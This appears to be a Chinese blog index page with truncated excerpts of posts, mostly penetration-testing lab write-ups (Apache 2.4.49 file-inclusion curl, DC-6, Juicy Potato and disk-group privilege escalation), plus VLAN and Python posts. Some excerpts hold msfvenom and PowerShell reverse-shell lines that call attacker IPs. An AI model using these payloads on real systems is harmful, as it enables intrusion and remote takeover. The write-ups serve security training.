zhyann
对curl进行URL编码
目标IP为:192.168.174.16web服务器为Apache httpd 2.4.49https://www.exploit-db.com/exploits/50383现在192.168.174.16在cgi-bin有文件包含漏洞 尝试用curl得到/opt/passwordscurl http://192...
VLAN原理和VLAN间路由3 配置Trunk
1. 概述配置Trunk时,应先使用port link-type trunk命令修改端口的类型为Trunk,然后再配置Trunk端口允许哪些VLAN的数据帧通过。执行port trunk allow-pass vlan { { vlan-id1 [ to vlan-i...
DC-6
实验环境攻击者 Kali 192.168.192.128受害者 DC-6 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为192.168.192.171 收集受害者服务详情nmap -sV -A 192.16...
disk组提权
https://vk9-sec.com/disk-group-privilege-escalation/?source=post_page-----b14a6e535e1f-------------------------------- 1. 首先查看属于我们组的硬盘ls -l /dev 2. 查看/root属于那个...
Objective 7
任务确定目标域中存在域管理会话的计算机入侵计算机并将权限提升至域管理员 - 使用对 dcorp-ci 的访问权限 - 使用派生的本地管理员 C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
powershell反弹shell制作
Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...
Exfiltrated
简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE Attack and exfiltrate the target! 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.186.163 Linux 1. 信息...
Python类 基础
1. 类的定义1.1 设计类在程序中设计表格 我们称之为:设计类(class)class Student: name = None #记录学生姓名class是关键字,表示要定义类了类的属性,即定义在类中的变量(成员变量)类的行为...
Flimsy
简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE No more flimsy excuses 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.200.220 Linux 1. 信息收集收集受...